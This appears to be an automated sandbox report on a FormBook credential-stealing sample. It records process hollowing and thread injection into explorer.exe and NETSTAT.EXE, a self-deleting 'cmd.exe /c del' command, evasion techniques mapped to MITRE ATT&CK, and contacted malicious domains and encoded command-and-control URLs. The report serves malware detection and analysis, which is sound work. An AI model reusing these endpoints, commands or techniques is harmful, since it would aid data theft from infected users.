          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00B47910 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,
          Source: C:\Users\user\Desktop\in.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.216 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\in.exe | Section loaded: unknown target: C:\Users\user\Desktop\in.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\in.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\in.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write (2 occurrences)
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\in.exe | Thread register set: target process: 3292
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3292
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\in.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\in.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C30000
          Source: C:\Users\user\Desktop\in.exe | Process created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmp | Binary or memory string: uProgram Manager
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.599512509.0000000000EB8000.00000004.00000020.sdmp | Binary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.273106949.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndAj

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 131 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Network Connections Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 11 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 339331, Sample: in.exe, Startdate: 13/01/2021, Architecture: WINDOWS, Score: 100

Sample-level findings: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures. DNS/IP info: www.spontaneoushomeschooler.com.

Process tree (signatures and network activity per node):

• in.exe (started): Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  • in.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected): System process connects to network (likely due to code injection or exploit); connects to 198.54.117.216, 49753, 80, NAMECHEAP-NETUS, United States; www.demenageseul.com 199.59.242.153, 49751, 80, BODIS-NJUS, United States; 6 other IPs or domains
      • NETSTAT.EXE (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
in.exe | 46% | Virustotal |
in.exe | 100% | Avira | TR/ATRAPS.Gen
in.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.in.exe.b40000.1.unpack | 100% | Avira | HEUR/AGEN.1123427
2.0.in.exe.b40000.0.unpack | 100% | Avira | HEUR/AGEN.1123427
2.2.in.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.in.exe.b40000.0.unpack | 100% | Avira | HEUR/AGEN.1123427
1.2.in.exe.1340000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.in.exe.b40000.0.unpack | 100% | Avira | HEUR/AGEN.1123427
1.2.in.exe.2b50000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.concur.design/uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.cptdesignstudio.com/uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.demenageseul.com/uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.spontaneoushomeschooler.com/ | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.spontaneoushomeschooler.com | 94.23.162.163 | true | true | | unknown
parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
www.demenageseul.com | 199.59.242.153 | true | true | | unknown
ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
www.cptdesignstudio.com | unknown | unknown | true | | unknown
www.seak.xyz | unknown | unknown | true | | unknown
www.besthandstool.icu | unknown | unknown | true | | unknown
www.concur.design | unknown | unknown | true | | unknown

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.concur.design/uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI | true | Avira URL Cloud: safe | unknown
